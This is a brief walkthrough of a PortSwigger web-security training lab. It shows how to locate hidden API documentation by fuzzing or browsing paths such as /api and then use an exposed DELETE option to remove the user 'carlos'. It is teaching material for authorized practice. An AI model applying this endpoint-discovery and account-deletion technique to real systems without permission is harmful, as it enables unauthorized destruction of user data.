Lab: Exploiting an API endpoint using documentation
Link to the Lab: https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation
In this lab you will learn to find the endpoint. So inorder to find the endpoint there will be certain paths in the web application where it stores it’s hidden endpoints.
If the API documentation is not present anywhere it doesn’t mean it’s not there.
Inorder to find the API endpoints you could use automated scanner that’s already in the burpsuite, you can fuzz the endpoints using a wordlist or you can look and manually explore it.
The paths are possibly like the /api or /api/users/ etc.
In this lab as a solution:
Step 1: Access the lab.
Step 2: In the lab URL add the path /api.
and you will get this screen.
In this it will show to options to GET, DELETE,PATCH. Just click on delete and enter the username: carlos .
The lab will be solved.
Thank you for reading.
